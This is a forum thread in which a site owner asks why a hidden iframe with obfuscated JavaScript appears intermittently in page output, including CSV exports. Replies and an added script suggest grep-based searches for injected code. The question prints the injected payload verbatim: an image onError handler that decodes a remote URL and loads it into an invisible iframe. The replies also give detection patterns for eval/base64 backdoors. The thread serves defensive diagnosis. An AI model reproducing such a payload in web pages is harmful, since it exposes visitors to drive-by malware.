Some pages on my small site are including an unintended hidden iframe with some JavaScript in their output. I've read about sites getting compromised and similar code being put into PHP and HTML files before, but that doesn't seem to be the issue here, as none of my files actually contain the content that ends up in the output. I have no clue how this is happening. Could there be some global PHP code that executes with every page load, or could it be at the Apache level? I am baffled.

Here's an example of what I am seeing in the output:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7867" height="1" width="1"><img src="about:blank" onError='bvnnho=unescape("%27");fyvdmn=eval("document.getElementById("+bvnnho+"npelmp"+bvnnho+").src=unescape("+bvnnho+"%68%74%74%70%3A%2F%2F"+bvnnho+")+document.getElementById("+bvnnho+"7867"+bvnnho+").id+unescape("+bvnnho+"%2E%69%6E%2F"+bvnnho+")+"+bvnnho+"1299250012"+bvnnho+"+unescape("+bvnnho+"%2E%70%68%70"+bvnnho+")");document.getElementById("npelmp").src=fyvdmn' style="width:300;height:300;border:0px;"><iframe id="npelmp" src="about:blank"></iframe></div>

I've reviewed my script carefully and don't see how it could be outputting this. The main reason I noticed it is that my script is used for writing a CSV file, and an iframe, even a hidden one, sticks out like a sore thumb inside a CSV file. My hosting company says they haven't had any complaints from their other customers, so it must be my problem.

I've checked my code (manually and by comparing it to my local copy), and I went through my database (which only contains integers anyway). I've found no sign of where this is coming from.

Oh, another thing that makes this so difficult to track down is that it isn't present every time. When I tried to show it to the host's support, it wasn't there.

Has anybody seen this before? Or any idea of where else I can look?


If you have SSH access, you can just run

grep iframe ./ -Ri

(Hint: cyber-terrorists usually use hidden sites, named " " or things like that; that's most likely how we'll find it.)

If that fails, try searching the database, either with phpMyAdmin or by dumping the raw content to a file and grepping it the usual way:

mysqldump -uUSERID -pPASSWORD DATABASENAME > mydump.sql
grep iframe mydump.sql -i

This is very common.

Search all files for any string that looks like:

<?php eval(base64_decode("ZnVuY3Rpb24g...

This code may be in the header.php file as well as other .php files.

Please post back here with what you find.
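The file searches from both answers combined into one pass, as an added example that is not part of either answer. The function name `scan_webroot`, the labels and the regexes are assumptions made for illustration; the `auto_prepend_file` check goes beyond the thread and covers the question's "global PHP code on every page load" case, since that PHP directive (settable in php.ini, .user.ini or .htaccess) runs a file before every request.

```shell
#!/bin/sh
# Added example: list files under a web root that contain the markers
# discussed in this thread. Output is "label<TAB>path"; every hit is a
# lead to review by hand, not proof of compromise.
# Requires a grep with -r and --include (GNU or BSD grep).
scan_webroot() (
    root=${1:?usage: scan_webroot DIR}
    # One "label|extended-regex" pair per line (labels are made up here).
    while IFS= read -r line; do
        label=${line%%|*}
        regex=${line#*|}
        # -r also descends into dot-directories and oddly named ones (" ").
        grep -rIilE \
            --include='*.php' --include='*.htm*' --include='*.js' \
            --include='*.ini' --include='.htaccess' \
            -e "$regex" "$root" 2>/dev/null |
            while IFS= read -r file; do
                printf '%s\t%s\n' "$label" "$file"
            done
    done <<'EOF'
eval-base64|eval[[:space:]]*\([[:space:]]*base64_decode
hidden-iframe|<iframe[^>]*(about:blank|display:[[:space:]]*none|(width|height)[=:]["']?0[^0-9])
unescape-chain|unescape\([^)]*%[0-9a-f]{2}
auto-prepend|auto_(prepend|append)_file[[:space:]]*=?[[:space:]]*[^[:space:]=]
EOF
)

# Stand-alone use: sh scan.sh /path/to/webroot
if [ "$#" -gt 0 ]; then
    scan_webroot "$1"
fi
```

An empty result together with injected output still appearing points away from the site's own files and toward something outside the web root (server-level configuration or modules), which is a question for the host.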